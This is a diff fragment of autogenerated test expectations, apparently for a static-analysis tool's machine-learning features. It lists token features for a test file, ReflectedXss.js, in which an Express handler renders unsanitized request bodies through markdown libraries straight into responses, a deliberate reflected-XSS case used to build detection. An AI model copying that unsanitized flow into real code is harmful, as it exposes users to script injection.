'\\u1f44b\\udc4b\\u1f30d\\udf0d' | CalleeFlexibleAccessPath | unified().use().use().use | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:61:24:61:29 | '\\u1f44b\\udc4b\\u1f30d\\udf0d' | InputAccessPathFromCallee | 1.title | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:61:24:61:29 | '\\u1f44b\\udc4b\\u1f30d\\udf0d' | InputArgumentIndex | 1 | @@ -19864,6 +133448,11 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:61:24:61:29 | '\\u1f44b\\udc4b\\u1f30d\\udf0d' | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:61:24:61:29 | '\\u1f44b\\udc4b\\u1f30d\\udf0d' | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:61:24:61:29 | '\\u1f44b\\udc4b\\u1f30d\\udf0d' | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:62:6:62:8 | use | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:62:6:62:8 | use | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:62:6:62:8 | use | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:62:6:62:8 | use | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:62:6:62:8 | use | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:62:10:62:15 | format | CalleeFlexibleAccessPath | unified().use().use().use().use | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:62:10:62:15 | format | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:62:10:62:15 | format | calleeImports | unified | @@ -19872,6 +133461,11 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:62:10:62:15 | format | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:62:10:62:15 | format | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:62:10:62:15 | format | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:63:6:63:8 | use | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:63:6:63:8 | use | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:63:6:63:8 | use | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:63:6:63:8 | use | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:63:6:63:8 | use | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:63:10:63:13 | html | CalleeFlexibleAccessPath | unified().use().use().use().use().use | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:63:10:63:13 | html | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:63:10:63:13 | html | calleeImports | unified | @@ -19880,6 +133474,16 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:63:10:63:13 | html | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:63:10:63:13 | html | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:63:10:63:13 | html | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:6:64:12 | process | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:6:64:12 | process | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:6:64:12 | process | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:6:64:12 | process | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:6:64:12 | process | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:14:64:16 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:14:64:16 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:14:64:16 | req | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:14:64:16 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:14:64:16 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:14:64:21 | req.body | CalleeFlexibleAccessPath | unified().use().use().use().use().use().process | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:14:64:21 | req.body | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:14:64:21 | req.body | calleeImports | unified | @@ -19888,6 +133492,31 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:14:64:21 | req.body | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:14:64:21 | req.body | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:14:64:21 | req.body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:18:64:21 | body | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:18:64:21 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:18:64:21 | body | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:18:64:21 | body | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:18:64:21 | body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:24:64:23 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:24:64:23 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:24:64:23 | res | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:24:64:23 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:24:64:23 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:24:64:23 | this | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:24:64:23 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:24:64:23 | this | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:24:64:23 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:24:64:23 | this | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:24:66:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:24:66:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:24:66:5 | 'arguments' object of anonymous function | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:24:66:5 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:24:66:5 | 'arguments' object of anonymous function | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:24:66:5 | exceptional return of anonymous function | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:24:66:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:24:66:5 | exceptional return of anonymous function | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:24:66:5 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:24:66:5 | exceptional return of anonymous function | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:24:66:5 | functio ... K\\n } | CalleeFlexibleAccessPath | unified().use().use().use().use().use().process | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:24:66:5 | functio ... K\\n } | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:24:66:5 | functio ... K\\n } | calleeImports | unified | @@ -19896,6 +133525,51 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:24:66:5 | functio ... K\\n } | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:24:66:5 | functio ... K\\n } | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:24:66:5 | functio ... K\\n } | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:24:66:5 | return of anonymous function | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:24:66:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:24:66:5 | return of anonymous function | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:24:66:5 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:24:66:5 | return of anonymous function | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:34:64:36 | err | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:34:64:36 | err | contextSurroundingFunctionParameters | (req, res)\n(err, file) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:34:64:36 | err | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:34:64:36 | err | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:34:64:36 | err | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:39:64:42 | file | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:39:64:42 | file | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:39:64:42 | file | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:39:64:42 | file | contextSurroundingFunctionParameters | (req, res)\n(err, file) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:39:64:42 | file | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:39:64:42 | file | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:39:64:42 | file | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:39:64:42 | file | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:39:64:42 | file | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:64:39:64:42 | file | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:65:7:65:9 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:65:7:65:9 | res | contextSurroundingFunctionParameters | (req, res)\n(err, file) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:65:7:65:9 | res | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:65:7:65:9 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:65:7:65:9 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:65:7:65:14 | res.send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:65:7:65:14 | res.send | contextSurroundingFunctionParameters | (req, res)\n(err, file) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:65:7:65:14 | res.send | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:65:7:65:14 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:65:7:65:14 | res.send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:65:7:65:20 | exceptional return of res.send(file) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:65:7:65:20 | exceptional return of res.send(file) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:65:7:65:20 | exceptional return of res.send(file) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:65:7:65:20 | exceptional return of res.send(file) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:65:7:65:20 | exceptional return of res.send(file) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:65:7:65:20 | res.send(file) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:65:7:65:20 | res.send(file) | contextSurroundingFunctionParameters | (req, res)\n(err, file) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:65:7:65:20 | res.send(file) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:65:7:65:20 | res.send(file) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:65:7:65:20 | res.send(file) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:65:11:65:14 | send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:65:11:65:14 | send | contextSurroundingFunctionParameters | (req, res)\n(err, file) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:65:11:65:14 | send | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:65:11:65:14 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:65:11:65:14 | send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:65:16:65:19 | file | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:65:16:65:19 | file | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:65:16:65:19 | file | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | @@ -19904,6 +133578,71 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:65:16:65:19 | file | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:65:16:65:19 | file | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:65:16:65:19 | file | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:3:68:5 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:3:68:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:3:68:5 | res | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:3:68:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:3:68:5 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:3:68:10 | res.send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:3:68:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:3:68:10 | res.send | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:3:68:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:3:68:10 | res.send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:3:68:53 | exceptional return of res.sen ... ring()) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:3:68:53 | exceptional return of res.sen ... ring()) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:3:68:53 | exceptional return of res.sen ... ring()) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:3:68:53 | exceptional return of res.sen ... ring()) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:3:68:53 | exceptional return of res.sen ... ring()) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:3:68:53 | res.sen ... ring()) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:3:68:53 | res.sen ... ring()) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:3:68:53 | res.sen ... ring()) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:3:68:53 | res.sen ... ring()) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:3:68:53 | res.sen ... ring()) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:7:68:10 | send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:7:68:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:7:68:10 | send | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title 